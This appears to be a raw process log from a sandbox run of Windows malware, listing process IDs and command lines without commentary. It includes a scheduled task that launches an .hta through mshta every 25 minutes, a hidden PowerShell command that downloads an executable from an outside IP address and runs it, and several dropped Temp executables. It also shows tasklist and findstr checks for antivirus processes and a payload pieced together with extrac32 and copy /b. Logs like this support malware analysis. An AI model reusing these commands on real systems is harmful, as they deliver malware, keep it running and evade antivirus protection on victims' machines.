cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn X0P6emaCZCT /tr "mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta" /sc minute /mo 25 /ru "test22" /f
2624schtasks.exe schtasks /create /tn X0P6emaCZCT /tr "mshta C:\Users\test22\AppData\Local\Temp\kCFxj8yNd.hta" /sc minute /mo 25 /ru "test22" /f
2728powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'FWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
2828TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE "C:\Users\test22\AppData\Local\TempFWKB4V1VE0EHHTJIYXH8AQZL1M4480K2.EXE"
3024790548e77c.exe "C:\Users\test22\AppData\Local\Temp\1014060001\790548e77c.exe"
276013Z5sqy.exe "C:\Users\test22\AppData\Local\Temp\1034761001\13Z5sqy.exe"
2792jonbDes.exe "C:\Users\test22\AppData\Local\Temp\1039270001\jonbDes.exe"
3004findstr.exe findstr /I "opssvc wrsa"
2204tasklist.exe tasklist
2108tasklist.exe tasklist
1064findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
2644cmd.exe cmd /c md 764661
740extrac32.exe extrac32 /Y /E Fm
2804findstr.exe findstr /V "Tunnel" Addresses
2984cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
3036cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
1484Macromedia.com Macromedia.com F
1728choice.exe choice /d y /t 15
828up7d8Ym.exe "C:\Users\test22\AppData\Local\Temp\1065345001\up7d8Ym.exe"
2696012Bdpb.exe "C:\Users\test22\AppData\Local\Temp\1065531001\012Bdpb.exe"
27447fOMOTQ.exe "C:\Users\test22\AppData\Local\Temp\1068334001\7fOMOTQ.exe"
2056Bjkm5hE.exe "C:\Users\test22\AppData\Local\Temp\1071208001\Bjkm5hE.exe"
3028explorer.exe C:\Windows\Explorer.EXE
1452